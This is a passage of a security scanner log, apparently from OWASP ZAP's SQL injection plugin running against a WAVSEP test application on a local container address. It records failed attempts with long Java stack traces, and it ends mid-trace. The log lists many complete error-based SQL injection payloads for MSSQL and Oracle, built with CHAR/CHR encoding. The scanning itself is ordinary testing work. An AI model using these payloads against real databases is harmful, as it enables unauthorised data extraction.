http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' AND 9856=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (9856=9856) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))) AND 'ZYxM'='ZYxM at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682068 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ AND 4929=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (4929=4929) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58)))-- vdjn] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ AND 4929=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (4929=4929) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58)))-- vdjn at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682069 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [) AND 3458=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (3458=3458) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND (3421=3421] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/) AND 3458=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (3458=3458) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND (3421=3421 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682071 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ AND 6860=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (6860=6860) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL)] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ AND 6860=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (6860=6860) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682071 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' AND 8812=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (8812=8812) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))) AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' AND 8812=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (8812=8812) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))) AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682072 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 1045=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (1045=1045) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58)))-- Itdk] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 1045=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (1045=1045) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58)))-- Itdk at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682073 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) AND 7295=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (7295=7295) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND (1105=1105] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) AND 7295=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (7295=7295) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND (1105=1105 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682074 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 3836=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (3836=3836) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL)] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 3836=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (3836=3836) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682075 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [') AND 5014=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (5014=5014) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND ('IWCV'='IWCV] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/') AND 5014=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (5014=5014) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND ('IWCV'='IWCV at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682076 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [' AND 2508=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (2508=2508) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND 'CBqq'='CBqq] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/' AND 2508=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (2508=2508) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND 'CBqq'='CBqq at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682079 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [%' AND 4161=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (4161=4161) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/%' AND 4161=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (4161=4161) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682080 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') AND 6109=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (6109=6109) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND ('qrfL'='qrfL] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') AND 6109=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (6109=6109) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND ('qrfL'='qrfL at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at 